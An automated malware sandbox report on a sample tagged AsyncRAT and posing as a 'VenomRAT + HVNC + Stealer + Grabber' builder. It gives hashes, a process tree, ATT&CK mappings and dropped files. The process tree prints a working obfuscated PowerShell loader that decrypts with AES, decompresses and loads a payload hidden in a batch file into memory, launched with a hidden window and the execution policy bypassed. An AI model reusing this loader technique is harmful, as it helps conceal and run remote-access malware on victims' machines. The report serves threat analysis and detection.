asyncrat | 35dd1e24b5d7024c28d728aa28146f910c0b9832b5dff75ce5e972b5a6f414c5

Resubmissions

15-04-2024 15:53

240415-tbwpfsce4y 10

23-03-2024 00:57

240323-ba892sbc56 10

Analysis

max time kernel
109s
max time network
17s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
15-04-2024 16:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

VenomRAT v6.0.3/Venom RAT + HVNC + Stealer + Grabber.exe
Size

26.1MB
MD5

a8776c9984c7b6c4f18bf0505ca939b5
SHA1

e23a41b6f03f11d3b6a64d5645fa102f373bd292
SHA256

5dbb0f9df5fc34b49f0e284afe9037206c29dd8e50f0adbbcca785dcca89592e
SHA512

9ebb8d42d1649cb2b3e97bd703d5daa4b1a87f21949c279335f5b0ee834ef185be473e23f82f0562a0f22c1e54675259113c6555976aee5b5def2087b34a8398
SSDEEP

786432:/h9/AxUNfm9O7HYazcKB9rZsiqS+r+/hGykCCU1:/h9YxUNpTYGRQGhGykCC

Score

10^/10

asyncrat execution rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2280 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

Venom RAT + HVNC + Stealer + Grabber.exe

pid process

2636 Venom RAT + HVNC + Stealer + Grabber.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2280 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2280 powershell.exe

pid	process
2280	powershell.exe

pid	process
2636	Venom RAT + HVNC + Stealer + Grabber.exe

pid	process
2280	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2280	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

Venom RAT + HVNC + Stealer + Grabber.exeVenom RAT + HVNC + Stealer + Grabber.execmd.exe

description	pid	process	target process
PID 1736 wrote to memory of 2712	1736	Venom RAT + HVNC + Stealer + Grabber.exe	cmd.exe
PID 1736 wrote to memory of 2712	1736	Venom RAT + HVNC + Stealer + Grabber.exe	cmd.exe
PID 1736 wrote to memory of 2712	1736	Venom RAT + HVNC + Stealer + Grabber.exe	cmd.exe
PID 1736 wrote to memory of 2636	1736	Venom RAT + HVNC + Stealer + Grabber.exe	Venom RAT + HVNC + Stealer + Grabber.exe
PID 1736 wrote to memory of 2636	1736	Venom RAT + HVNC + Stealer + Grabber.exe	Venom RAT + HVNC + Stealer + Grabber.exe
PID 1736 wrote to memory of 2636	1736	Venom RAT + HVNC + Stealer + Grabber.exe	Venom RAT + HVNC + Stealer + Grabber.exe
PID 2636 wrote to memory of 2860	2636	Venom RAT + HVNC + Stealer + Grabber.exe	WerFault.exe
PID 2636 wrote to memory of 2860	2636	Venom RAT + HVNC + Stealer + Grabber.exe	WerFault.exe
PID 2636 wrote to memory of 2860	2636	Venom RAT + HVNC + Stealer + Grabber.exe	WerFault.exe
PID 2712 wrote to memory of 2432	2712	cmd.exe	cmd.exe
PID 2712 wrote to memory of 2432	2712	cmd.exe	cmd.exe
PID 2712 wrote to memory of 2432	2712	cmd.exe	cmd.exe
PID 2712 wrote to memory of 2280	2712	cmd.exe	powershell.exe
PID 2712 wrote to memory of 2280	2712	cmd.exe	powershell.exe
PID 2712 wrote to memory of 2280	2712	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe
"C:\Users\Admin\AppData\Local\Temp\VenomRAT v6.0.3\Venom RAT + HVNC + Stealer + Grabber.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Venom.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function ztZFv($NRwiA){ $nQAla=[System.Security.Cryptography.Aes]::Create(); $nQAla.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nQAla.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nQAla.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('QdoYxUkiCqDUKhWwrTH7AerfcIF5j7b/N2RWKPLtoYY='); $nQAla.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('odLQJwhJTyobsFXcB4hGIA=='); $gHZYb=$nQAla.CreateDecryptor(); $return_var=$gHZYb.TransformFinalBlock($NRwiA, 0, $NRwiA.Length); $gHZYb.Dispose(); $nQAla.Dispose(); $return_var;}function RqfAN($NRwiA){ $eThoy=New-Object System.IO.MemoryStream(,$NRwiA); $sppNM=New-Object System.IO.MemoryStream; Invoke-Expression '$TwzvL #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$eThoy,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TwzvL.CopyTo($sppNM); $TwzvL.Dispose(); $eThoy.Dispose(); $sppNM.Dispose(); $sppNM.ToArray();}function mReVh($NRwiA,$dHouc){ $RXzAR = @( '$nUQVd = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$NRwiA);', '$TAeyG = $nUQVd.EntryPoint;', '$TAeyG.Invoke($null, $dHouc);' ); foreach ($CnxNU in $RXzAR) { Invoke-Expression $CnxNU };}$DsIiH=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Roaming\Venom.bat').Split([Environment]::NewLine);foreach ($REdJF in $DsIiH) { if ($REdJF.StartsWith('SEROXEN')) { $LHnvh=$REdJF.Substring(7); break; }}$AShmJ=RqfAN (ztZFv ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($LHnvh)));mReVh $AShmJ (,[string[]] ('C:\Users\Admin\AppData\Roaming\Venom.bat')); "
3⤵
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
"C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2636

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2636 -s 528
3⤵
PID:2860

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2844

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Venom RAT + HVNC + Stealer + Grabber.exe
Filesize
14.2MB

MD5
3b3a304c6fc7a3a1d9390d7cbff56634

SHA1
e8bd5244e6362968f5017680da33f1e90ae63dd7

SHA256
7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58

SHA512
7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

Download Submit
C:\Users\Admin\AppData\Roaming\Venom.bat
Filesize
11.9MB

MD5
04fd97b8a5d2132eee84f856ee0fa938

SHA1
0d1d515140d76fcd9a2dc7f08f9d7a7d9f8d691a

SHA256
bb33e3c94abeda061b89a1d70d2430b74fcc40a81b09c732878939308a676e49

SHA512
e5b4e624343b3e9bec048c894ba681a44d8e71735c03445c361f059dc0aeb53afabeee37bb82ea9ad47187d305ecf28c1b6e46a039a1630da08e2488edb00778

Download Submit
memory/1736-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp

Filesize
4KB

Download
memory/1736-1-0x0000000001070000-0x0000000002A9A000-memory.dmp

Filesize
26.2MB

Download
memory/1736-2-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/1736-19-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2280-24-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2280-25-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2636-17-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2636-18-0x00000000006C0000-0x00000000014F4000-memory.dmp

Filesize
14.2MB

Download
memory/2636-26-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download
memory/2636-28-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

Filesize
9.9MB

Download